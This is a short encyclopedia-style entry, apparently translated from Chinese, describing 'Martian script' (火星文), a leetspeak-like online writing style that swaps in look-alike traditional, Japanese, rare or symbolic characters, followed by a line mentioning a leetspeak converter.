  • leetspeak: also known as "Martian script" (火星文). The concept is hard to pin down: although it is widespread online, it is hard to call it an internet language, because this "brain-dead" style has nothing to do with coined vocabulary and is merely a distorted way of writing Chinese characters. It typically shows up as heavy use of look-alike substitute characters within a word, a sentence or even a whole passage.
  • These substitute characters come from all over: mostly traditional Chinese characters, Japanese kanji and rare characters (the so-called strange or garbled characters), plus some simplified characters, even Japanese kana and pinyin letters, sometimes mixed with piles of random symbols.
  • The style is also used when registering company names to avoid duplicates: Leetspeak Converter